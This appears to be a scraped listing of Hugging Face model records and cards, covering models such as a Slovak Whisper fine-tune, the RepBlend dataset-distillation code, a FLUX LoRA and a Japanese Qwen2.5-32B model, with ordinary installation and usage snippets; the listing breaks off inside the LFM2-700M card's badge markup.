"long feathered wolf",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T01:36:17Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- long feathered wolf
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
tcktbar13122/grun_3
|
tcktbar13122
| 2025-09-23T15:05:14Z | 14 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"token-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
token-classification
| 2025-09-19T18:28:19Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v4
|
alesiaivanova
| 2025-09-23T15:03:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:01:56Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v4
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/jkgv56zg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
xinxin66/RepBlend
|
xinxin66
| 2025-09-23T15:02:00Z | 0 | 1 | null |
[
"arxiv:2505.14705",
"license:mit",
"region:us"
] | null | 2025-09-23T14:00:18Z |
---
license: mit
---
# 🌟 Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation
# NeurIPS 2025
> [Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation](https://arxiv.org/pdf/2505.14705?).<br>
> [Xin Zhang](https://zhangxin-xd.github.io/), Ziruo Zhang, [Jiawei Du](https://scholar.google.com/citations?user=WrJKEzEAAAAJ&hl=zh-CN), [Zuozhu Liu](https://person.zju.edu.cn/en/lzz), [Joey Tianyi Zhou](https://joeyzhouty.github.io/) <br>
> Agency for Science, Technology, and Research (ASTAR), Singapore <br>
> National University of Singapore, Singapore <br>
> Zhejiang University, China <br>
## 📖 Introduction
<p align="center">
<img src="imgs/problem.png" alt="problem" title="problem" width="700">
</p>
<p align="justify">
<strong> Multimodal embedding distributions across various distillation methods </strong>:
We extract image and text embeddings from a finetuned CLIP and project them into a shared representation space using DOSNES.
Red triangles and blue circles denote image and text embeddings, respectively.
Left: Embeddings from randomly sampled data in the original dataset exhibit a well-spread and modality-aligned distribution.
Middle: The distilled dataset generated by a sota MDD method (LoRS) leads to Modality Collapse, where image and text embeddings are poorly aligned and concentrated in distinct regions.
Right: Our method effectively mitigates modality collapse, yielding a distribution that better preserves cross-modal alignment and exhibits greater representational diversity.
</p>
## ⚙️ Installation
To get started, follow these instructions to set up the environment and install dependencies.
1. **Clone this repository**:
```bash
git clone https://github.com/zhangxin-xd/RepBlend.git
cd RepBlend
```
2. **Install required packages**:
```
conda create -n RepBlend python=3.10
conda activate RepBlend
pip install -r requirements.txt
```
---
## 🚀 Usage
Here’s how to use RepBlend for Multimodal Dataset Distillation:
First, download the pretrained weights and datasets and place them into their respective folders.
### Pretrained Weights
The checkpoints for all experimental networks are available from their respective official repositories. For convenience, we have also provided them together [🤗 here](https://huggingface.co/xinxin66/RepBlend).
Once downloaded, put them in `distill_utils/checkpoints/`.
### Experimental Datasets
The method has been validated on various benchmark datasets, which you can download from their respective links below. Once downloaded, put them in `distill_utils/data/`.
| datasets | links|
|-----|-----|
| Flickr30K | [images](https://www.kaggle.com/datasets/hsankesara/flickr-image-dataset), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend/)|
| COCO | [images](https://cocodataset.org/#download), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend) |
|LLaVA-cc3m|[images](https://github.com/haotian-liu/LLaVA/blob/main/docs/Data.md), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend)|
### Generate Expert Trajectories
You can generate expert trajectories by running `scripts/buffer.sh`, or alternatively download our [🤗 pre-generated trajectories](https://huggingface.co/xinxin66/RepBlend) for faster reproduction.
```
bash scripts/buffer.sh
```
### Distill Multimodal Dataset
You can distill multimodal datasets with RepBlend by running `scripts/distill_coco_repblend.sh` and `scripts/distill_flickr_repblend.sh`.
```
bash scripts/distill_coco_repblend.sh
bash scripts/distill_flickr_repblend.sh
```
## 📊 Results
Our experiments demonstrate the effectiveness of the proposed approach across various benchmarks.
<div style="display: flex; justify-content: center; align-items: center;">
<img src="imgs/results 1.png" alt="Results 1" width="800"/>
</div>
<br>
<div style="display: flex; justify-content: center; align-items: center;">
<img src="imgs/table 1.png" alt="table 1" width="400"/>
<img src="imgs/table 2.png" alt="table 2" width="400"/>
</div>
For detailed experimental results and further analysis, please refer to the full paper.
---
## 📑 Citation
If you find this code useful in your research, please consider citing our work:
```bibtex
@inproceedings{RepBlend2025neurips,
title={Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation},
  author={Zhang, Xin and Zhang, Ziruo and Du, Jiawei and Liu, Zuozhu and Zhou, Joey Tianyi},
booktitle={Adv. Neural Inf. Process. Syst. (NeurIPS)},
year={2025}
}
```
---
## 🎉 Reference
Our code has referred to previous works:
- [LoRS: Low-Rank Similarity Mining](https://github.com/silicx/LoRS_Distill)
- [Vision-Language Dataset Distillation](https://github.com/princetonvisualai/multimodal_dataset_distillation)
- [Scaling Up Dataset Distillation to ImageNet-1K with Constant Memory (TESLA)](https://github.com/justincui03/tesla)
|
dommmm01/SLAXYNI
|
dommmm01
| 2025-09-23T14:59:24Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:59:24Z |
---
license: apache-2.0
---
|
erikbozik/whisper-small-sk
|
erikbozik
| 2025-09-23T14:56:52Z | 9 | 0 | null |
[
"safetensors",
"whisper",
"speech",
"asr",
"slovak",
"parliament",
"legal",
"politics",
"sk",
"dataset:erikbozik/slovak-plenary-asr-corpus",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:mit",
"model-index",
"region:us"
] | null | 2025-06-18T12:38:35Z |
---
language:
- sk
tags:
- speech
- asr
- whisper
- slovak
- parliament
- legal
- politics
base_model: openai/whisper-small
datasets:
- erikbozik/slovak-plenary-asr-corpus
metrics:
- wer
model-index:
- name: whisper-small-sk
results:
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: Common Voice 21 (Slovak test set)
type: common_voice
metrics:
- name: WER
type: wer
value: 25.7
- task:
type: automatic-speech-recognition
name: Automatic Speech Recognition
dataset:
name: FLEURS (Slovak test set)
type: fleurs
metrics:
- name: WER
type: wer
value: 10.6
license: mit
---
# Whisper Small — Fine-tuned on Slovak Plenary ASR Corpus
This model is a fine-tuned version of [`openai/whisper-small`](https://huggingface.co/openai/whisper-small).
It is adapted for **Slovak ASR** using the [Slovak Plenary ASR Corpus](https://huggingface.co/datasets/erikbozik/slovak-plenary-asr-corpus): **2,806 hours** of aligned, ≤30 s speech–text pairs from official plenary sessions of the **Slovak National Council**.
- **Language:** Slovak
- **Domain:** Parliamentary / formal speech
- **Training data:** 2,806 h
- **Intended use:** Slovak speech recognition; strongest in formal/public-speaking contexts
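A minimal usage sketch with the Transformers pipeline; the audio path is a placeholder, and long recordings may need chunking:

```python
from transformers import pipeline

asr = pipeline("automatic-speech-recognition", model="erikbozik/whisper-small-sk")
result = asr(
    "slovak_speech.wav",  # placeholder audio file
    generate_kwargs={"language": "slovak", "task": "transcribe"},
)
print(result["text"])
```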
## 🧪 Evaluation
| Dataset | Base WER | Fine-tuned WER | Δ (abs) |
|---|---:|---:|---:|
| Common Voice 21 (sk) | 58.4 | **25.7** | -32.7 |
| FLEURS (sk) | 36.1 | **10.6** | -25.5 |
*Numbers from the paper’s final benchmark runs.*
## 🔧 Training Details
- **Framework:** Hugging Face Transformers
- **Hardware:** NVIDIA A10 GPUs
- **Epochs:** up to 3 with early stopping on validation WER
- **Learning rate:** ~**40× smaller** than Whisper pretraining LR
## ⚠️ Limitations
- Domain bias toward parliamentary speech (e.g., political vocabulary, formal register).
- As with Whisper models generally, occasional hallucinations may appear; consider temperature fallback / compression-ratio checks at inference time.
- Multilingual performance is not guaranteed (full-parameter finetuning emphasized Slovak).
## 📄 Paper & Citation
Coming soon.
## 🙏 Acknowledgements
This work was supported by [**VÚB Banka**](https://www.vub.sk), which provided the GPU resources and backing necessary to accomplish it, enabling progress in Slovak ASR research.
|
tstenborg/ppo-SnowballTarget
|
tstenborg
| 2025-09-23T14:55:23Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:55:19Z |
---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: tstenborg/ppo-SnowballTarget
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
eserder/thibaut_ia_1
|
eserder
| 2025-09-23T14:52:22Z | 0 | 0 |
diffusers
|
[
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] |
text-to-image
| 2025-09-23T14:22:16Z |
---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: eserder
---
# Thibaut_Ia_1
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `eserder` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "eserder",
"lora_weights": "https://huggingface.co/eserder/thibaut_ia_1/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('eserder/thibaut_ia_1', weight_name='lora.safetensors')
image = pipeline('eserder').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/eserder/thibaut_ia_1/discussions) to add images that show off what you’ve made with this LoRA.
|
deep-analysis-research/Flux-Japanese-Qwen2.5-32B-Instruct-V1.0
|
deep-analysis-research
| 2025-09-23T14:52:09Z | 9 | 1 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"chat",
"conversational",
"en",
"base_model:Qwen/Qwen2.5-32B",
"base_model:finetune:Qwen/Qwen2.5-32B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-18T05:46:29Z |
---
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen2.5-32B-Instruct/blob/main/LICENSE
language:
- en
pipeline_tag: text-generation
base_model: Qwen/Qwen2.5-32B
tags:
- chat
library_name: transformers
---
# Flux-Japanese-Qwen2.5-32B-Instruct-V1.0
[**English**] [[Japanese](./README-ja.md)]
Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 is a 32-billion-parameter open-weights model with strong performance in Japanese knowledge, reasoning, and language. It is trained from Qwen2.5-32B-Instruct and released under the Apache 2.0 open-source license.
# 🏆 Open-Japanese-LLM-Leaderboard Rank-1
On the [Open Japanese LLM Leaderboard](https://huggingface.co/spaces/deep-analysis-research/open-japanese-llm-leaderboard), Qwen2.5-32B-Instruct scores 0.6553, the former top-ranked D2IL-Japanese-Qwen2.5-32B-Instruct-v0.1 scores 0.7100, and Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 scores 0.7417. Compared with the original Qwen2.5-32B-Instruct, Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 demonstrates significant gains across most tasks, with especially strong improvements in FA (Fundamental Analysis, 基礎分析), SUM (Summarization, 要約), and CG (Code Generation, コード生成).
| Tasks | Qwen2.5-32B-Instruct | D2IL-Japanese-Qwen2.5-32B-Instruct-v0.1 | Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 |
|------------------------------------|----------------------|-----------------------------------------|------------------------------------------|
| NLI - 自然言語推論 | 0.8106 | 0.8793 | 0.8846 (+0.0740) |
| QA - 質問応答 | 0.541 | 0.5897 | 0.5965 (+0.0555) |
| RC - 読解力 | 0.9047 | 0.9005 | 0.9261 (+0.0214) |
| MC - 多肢選択式質問応答 | 0.8966 | 0.9139 | 0.9128 (+0.0162) |
| EL - エンティティリンキング | 0.5894 | 0.6782 | 0.6975 (+0.1081) |
| FA - 基礎分析 | 0.2737 | 0.4321 | 0.5185 (+0.2448) |
| MR - 数学的推論 | 0.944 | 0.938 | 0.9420 (-0.0020) |
| MT - 機械翻訳 | 0.8479 | 0.7954 | 0.8389 (-0.0090) |
| HE - 試験問題 | 0.7757 | 0.7902 | 0.7987 (+0.0230) |
| CG - コード生成 | 0.5281 | 0.6084 | 0.7610 (+0.2329) |
| SUM - 要約 | 0.097 | 0.2843 | 0.2827 (+0.1857) |
| **Average** | **0.6553** | **0.71** | **0.7417 (+0.0864)** |
# 🚀 Consistent General Performance
While Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 has been specifically tuned for Japanese, its average performance on general capabilities and English tasks remains within about 1 point of Qwen2.5-32B-Instruct, indicating negligible impact. The evaluation is based on [simple-evals](https://github.com/deep-analysis-research/simple-evals).
| Tasks | Dataset | Qwen2.5-32B-Instruct | Flux-Japanese-Qwen2.5-32B-Instruct-V1.0 |
|---------------------|----------------|----------------------|------------------------------------------|
| General Tasks | MMLU-redux | 80.37 | 80.03 (-0.34) |
| | GPQA-Diamond | 46.11 | 47.32 (+1.21) |
| | MMLU | 82.84 | 83.39 (+0.55) |
| Math Tasks | MATH-500 | 78.14 | 78.50 (+0.36) |
| | AIME24 | 17.06 | 17.92 (+0.86) |
| | AIME25 | 16.25 | 14.58 (-1.67) |
| | MT-AIME24 | 12.73 | 12.97 (+0.24) |
| Multilingual Tasks | Multi-IF | 71.85 | 63.45 (-8.40) |
| | INCLUDE | 65.16 | 64.64 (-0.52) |
| | MMMLU | 73.43 | 74.08 (+0.65) |
| Coding Tasks | HumanEval | 87.93 | 86.51 (-1.42) |
| Alignment Tasks | IFEval | 78.37 | 77.46 (-0.91) |
| **Average** | | **59.17** | **58.40 (-0.77)** |
# ⚙️ Technical Development
<center><img src="tech-dev.png" alt="technical-development"/></center>
- **Phase 1: Interpretability Analysis & Pinpoint Tuning** — Mechanistic interpretability techniques are used to identify independent pathways/circuits for Japanese knowledge, reasoning, and language, and targeted pinpoint tuning is applied to only 5% of the parameters. This produces three expert models specialized respectively in Japanese knowledge, reasoning, and language.
- **Phase 2: Pinpoint Merging** — Perform pinpoint parameter merging on the three expert models to obtain a unified model that reaches expert-level performance across Japanese knowledge, reasoning, and language [[Code of Pinpoint Merging](https://github.com/deep-analysis-research/SLTA)].
# 🚩 Quickstart
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
device = "cuda" # the device to load the model onto
model = AutoModelForCausalLM.from_pretrained(
"Deep-Analysis-Research/Flux-Japanese-Qwen2.5-32B-V1.0",
torch_dtype="auto",
device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained("deep-analysis-research/Flux-Japanese-Qwen2.5-32B-Instruct-V1.0")
prompt = "大規模言語モデルについて簡単に紹介してください。"
messages = [
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(device)
generated_ids = model.generate(
model_inputs.input_ids,
max_new_tokens=512
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
print(response)
```
# 💡 Terms of Use
We have employed various techniques to reduce bias, harmful outputs, and other risks in the model. While these efforts help improve safety and reliability, the model, like all Large Language Models, may still generate inaccurate, misleading, biased, or otherwise undesirable content. By downloading, using, or interacting with this model, you acknowledge these limitations and agree to the following:
1. Prohibited Uses
- You may NOT use this model for any illegal, unlawful, or harmful activities, including but not limited to fraud, abuse, harassment, privacy violations, or the creation/dissemination of malicious content.
2. User Responsibility
- You are solely responsible for how you use the model and for any outcomes that result from its use.
- The authors and institutions involved in releasing this model do NOT accept liability for any consequences arising from its use.
3. No Warranty
- The model is provided “as is” without any warranties or guarantees.
|
LiquidAI/LFM2-700M
|
LiquidAI
| 2025-09-23T14:49:20Z | 8,746 | 74 |
transformers
|
[
"transformers",
"safetensors",
"lfm2",
"text-generation",
"liquid",
"edge",
"conversational",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-07-10T12:01:39Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
---
<center>
<div style="text-align: center;">
<img
src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/7_6D7rWrLxp2hb6OHSV1p.png"
alt="Liquid AI"
style="width: 100%; max-width: 66%; height: auto; display: inline-block; margin-bottom: 0.5em; margin-top: 0.5em;"
/>
</div>
<div style="display: flex; justify-content: center;">
<a href="https://playground.liquid.ai/chat">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Playground" style="margin-bottom: 1em;">
<title>Playground</title>
<g>
<rect fill="#fff" width="200" height="200"></rect>
<rect fill="url(#x)" x="200" width="800" height="200"></rect>
</g>
<g transform="translate(35, 30) scale(0.45, 0.45)">
<path d="M172.314 129.313L172.219 129.367L206.125 188.18C210.671 195.154 213.324 203.457 213.324 212.382C213.324 220.834 210.956 228.739 206.839 235.479L275.924 213.178L167.853 33.6L141.827 76.9614L172.314 129.313Z" fill="black"/>
<path d="M114.217 302.4L168.492 257.003C168.447 257.003 168.397 257.003 168.352 257.003C143.515 257.003 123.385 237.027 123.385 212.387C123.385 203.487 126.023 195.204 130.55 188.24L162.621 132.503L135.966 86.7327L60.0762 213.183L114.127 302.4H114.217Z" fill="black"/>
<path d="M191.435 250.681C191.435 250.681 191.43 250.681 191.425 250.686L129.71 302.4H221.294L267.71 226.593L191.435 250.686V250.681Z" fill="black"/>
</g>
<g transform="translate(50, 0)" aria-hidden="true" fill="#fff" text-anchor="start" font-family="Verdana,DejaVu Sans,sans-serif" font-size="110">
<text x="255" y="148" textLength="619" fill="#000" opacity="0.1">Playground</text>
<text x="245" y="138" textLength="619">Playground</text>
</g>
<linearGradient id="x" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
<stop offset="100%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
<a href="https://leap.liquid.ai/?utm_source=huggingface&utm_medium=modelcards">
<svg width="114.8" height="20" viewBox="0 0 900 200" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Leap" style="margin-bottom: 1em;">
<title>Leap</title>
<g>
<rect fill="#000" width="500" height="200"></rect>
</g>
<g transform="translate(100, 45) scale(3.5, 3.5)" fill="#fff">
<path d="M13.8512 28.0769C12.5435 28.0769 11.4025 27.8205 10.4281 27.3077C9.45375 26.7692 8.68452 26.0128 8.12042 25.0385C7.58196 24.0641 7.31273 22.9359 7.31273 21.6538V3.76923H0.389648V0H11.4666V21.6538C11.4666 22.4744 11.6973 23.1282 12.1589 23.6154C12.6204 24.0769 13.2486 24.3077 14.0435 24.3077H20.582V28.0769H13.8512Z"/>
<path d="M29.6439 28.4615C27.9259 28.4615 26.4131 28.1282 25.1054 27.4615C23.8233 26.7692 22.8362 25.8077 22.1439 24.5769C21.4516 23.3462 21.1054 21.9103 21.1054 20.2692V14.7308C21.1054 13.0641 21.4516 11.6282 22.1439 10.4231C22.8362 9.19231 23.8233 8.24359 25.1054 7.57692C26.4131 6.88462 27.9259 6.53846 29.6439 6.53846C31.3875 6.53846 32.9003 6.88462 34.1823 7.57692C35.4644 8.24359 36.4516 9.19231 37.1439 10.4231C37.8362 11.6282 38.1823 13.0641 38.1823 14.7308V18.5H25.1054V20.2692C25.1054 21.8333 25.49 23.0256 26.2592 23.8462C27.0541 24.6667 28.1951 25.0769 29.6823 25.0769C30.8875 25.0769 31.8618 24.8718 32.6054 24.4615C33.349 24.0256 33.8105 23.3974 33.99 22.5769H38.1054C37.7977 24.3718 36.8746 25.8077 35.3362 26.8846C33.7977 27.9359 31.9003 28.4615 29.6439 28.4615ZM34.1823 16V14.6923C34.1823 13.1538 33.7977 11.9615 33.0285 11.1154C32.2592 10.2692 31.131 9.84615 29.6439 9.84615C28.1823 9.84615 27.0541 10.2692 26.2592 11.1154C25.49 11.9615 25.1054 13.1667 25.1054 14.7308V15.6923L34.49 15.6538L34.1823 16Z"/>
<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
